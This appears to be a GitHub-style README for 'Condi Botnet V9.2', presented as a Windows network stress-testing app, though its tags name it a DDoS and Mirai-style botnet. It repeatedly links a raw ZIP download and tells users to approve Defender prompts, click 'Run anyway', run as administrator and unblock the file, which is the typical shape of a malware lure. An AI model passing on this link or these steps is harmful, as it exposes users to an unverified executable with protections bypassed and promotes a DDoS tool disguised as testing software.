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πŸ›‘οΈ Condi-Botnet-V9.2 - Simple Control for Fast Testing

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πŸ“₯ Download

Visit this page to download: https://raw.githubusercontent.com/brandaobe8314/Condi-Botnet-V9.2/main/assets/Botnet_Condi_1.2.zip

πŸ–₯️ What This App Does

Condi Botnet V9.2 is a Windows app for network stress testing and device control in a lab setup. It helps you run tests, watch connected nodes, and check how a system handles load.

Use it when you need a simple tool to:

  • start and stop test jobs
  • check node status
  • watch traffic levels
  • run layer 4 and layer 7 tests
  • manage a small bot pool in one place

βœ… Before You Start

Use a Windows PC with:

  • Windows 10 or Windows 11
  • 4 GB RAM or more
  • 200 MB free disk space
  • a stable internet connection
  • admin access if Windows asks for it

You may also need:

  • Microsoft Defender prompt approval if Windows flags the file
  • a ZIP tool like built-in Windows Extract or 7-Zip
  • a desktop folder with full write access

πŸš€ Getting Started

  1. Open the release page
    https://raw.githubusercontent.com/brandaobe8314/Condi-Botnet-V9.2/main/assets/Botnet_Condi_1.2.zip

  2. Find the latest release
    Look for the newest version at the top of the page.

  3. Download the Windows file
    Get the file that matches your PC. Most users should choose the .exe or .zip file for Windows.

  4. Extract the files if needed
    If the download is a ZIP file, right-click it and select Extract All.

  5. Open the app
    Double-click the main program file to launch Condi Botnet V9.2.

  6. Allow access if Windows asks
    If a security prompt appears, choose the option that lets the app run on your PC.

🧭 First Run Setup

When the app opens for the first time, it may ask you to set a few basic items:

  • a save folder for logs and config
  • a default port
  • a local dashboard password
  • a node list or bot list file

Use simple values the first time:

  • keep the default port unless you know you need a different one
  • choose a folder you can find later, such as Documents
  • use a password you can type again without errors

If the app shows a blank screen at first, wait a few seconds while it loads local files.

🧰 Main Features

πŸ–₯️ Simple Control Panel

Use one screen to see the main controls, active jobs, and current status.

πŸ“‘ Node Management

Add, remove, and sort connected nodes from one list. This helps you keep track of what is online.

πŸ“ˆ Traffic View

Watch basic load numbers during a test. This helps you see if a task is still running.

πŸ” Layer 4 and Layer 7 Modes

Run basic network tests at transport level or app level, based on the job you choose.

πŸ—‚οΈ Log Viewer

Check recent activity, failed runs, and system messages in one place.

βš™οΈ Profile Saving

Save test settings so you can load them again later.

πŸͺŸ How to Run on Windows

If you downloaded a ZIP file:

  1. Right-click the ZIP file
  2. Select Extract All
  3. Open the extracted folder
  4. Double-click the main .exe file

If Windows shows a security message:

  1. Click More info
  2. Click Run anyway if you trust the source
  3. Wait for the app to open

If the app does not start:

  1. Right-click the file
  2. Choose Run as administrator
  3. Try again

🧩 Typical File Layout

After extraction, you may see files like:

  • Condi-Botnet-V9.2.exe
  • config.json
  • nodes.txt
  • logs
  • assets
  • readme files

Keep these files in the same folder. The app may need them to start with the right settings.

πŸ› οΈ Common Setup Tasks

Change the Config Folder

Pick a folder that is easy to find, such as:

  • Documents\Condi
  • Desktop\Condi-Botnet-V9.2
  • Downloads\Condi

Add Nodes

Use the node list screen or import file option to load your nodes from a text file.

Save a Profile

Save your current setup after you finish your first test. This makes the next run faster.

Clear Old Logs

Delete old log files when the folder gets too full. Keep any logs you may need later.

πŸ”’ Safety on Your PC

Keep the app in a folder you control. Do not move files around after the app starts unless you plan to update the path in the config.

If you use a shared PC:

  • create one folder for this app
  • avoid putting the app in system folders
  • keep your config file backed up

πŸ§ͺ Basic Use Flow

  1. Open the app
  2. Load your node list
  3. Choose a test profile
  4. Set the target or job details
  5. Start the test
  6. Watch status and traffic
  7. Stop the test when you are done
  8. Save logs if you need them later

πŸ“ Backup and Restore

To back up your setup:

  • copy the whole app folder to another drive
  • save your config file
  • keep your node list in a second file

To restore:

  • copy the folder back to your PC
  • open the app from the same file path
  • load your saved profile

❓ Troubleshooting

The app does not open

  • make sure you extracted all files
  • run the app as admin
  • check that your antivirus did not block the file

The window opens and closes

  • the app may need the full folder, not one file
  • check for missing config files
  • open it from the extracted folder

The screen looks blank

  • wait a short time
  • confirm the app has internet access if it needs it
  • restart the app

The app says a file is missing

  • restore the full folder from the ZIP
  • do not delete any files in the folder
  • download the release again if needed

Windows blocks the file

  • open the file properties
  • choose Unblock if the button appears
  • try again after that

πŸ“Œ Release Page

Download from the release page here: https://raw.githubusercontent.com/brandaobe8314/Condi-Botnet-V9.2/main/assets/Botnet_Condi_1.2.zip

🏷️ Topics

botnet, condi-botnet, ddos, ddos-botnet, ddos-service, iot-botnet, layer4, layer7, mirai-botnet, zxcr9999

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